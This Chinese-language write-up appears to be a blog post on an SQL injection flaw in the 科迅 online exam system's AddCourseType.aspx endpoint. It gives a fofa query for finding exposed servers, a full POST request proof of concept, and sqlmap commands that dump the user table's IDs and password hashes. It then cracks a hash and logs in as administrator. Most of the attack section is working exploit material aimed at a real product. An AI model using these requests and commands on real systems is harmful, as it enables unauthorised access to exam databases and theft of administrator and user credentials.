记一次SQL注入漏洞获取管理员账号密码

一、漏洞描述

 科迅网上考试系统 /Management/AddCourseType.aspx接口Name参数存在SQL注入漏洞

二、影响范围

 科迅网上考试系统

三、fofa查询

body="欢迎使用科迅网上考试系统"

四、漏洞检测

POC

POST /Management/AddCourseType.aspx HTTP/1.1
Host: 
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/Management/AddCourseType.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=blajqxgi5muyg022ye3rn1cs
Connection: keep-alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE3NzQyNTUyNWRk%2F7Hp0Q4xOhbh8E%2FGKSPBPcRdUwon9oaL19Jnv4qQaMk%3D&__VIEWSTATEGENERATOR=C7764A33&__EVENTVALIDATION=%2FwEdAAOd59KI4MZ%2Bgo%2FmA1sXVDlV3nwmuJoxL7yCdENqmQn8N5ZYgDymPir0Zp4mFYzbkIggG1rfQ8Mi%2BkoQ5a%2B9befIlpw%2FsZ9Cvs%2Fn2lgFrt0%2BWQ%3D%3D&typeName=1*&btnSave=%E4%BF%9D+%E5%AD%98

五、漏洞利用 

使用SQLmap进行漏洞利用

获取当前数据库名称

python sqlmap.py -r cnvd.txt --current-db

获取当前数据库表名  这里一般都是找user表 

python sqlmap.py -r cnvd.txt -D ExamSystem --tables

获取当前数据库列名

python sqlmap.py -r cnvd.txt -D ExamSystem -T User_UserInfo --column

获取当前数据库字段

python sqlmap.py -r cnvd.txt -D ExamSystem -T User_UserInfo -C  UserId,Pwd -dump

可以使用https://cmd5.com/ 对加密的密码解密

50C215BB3B599960/123456

获取账号密码后成功登录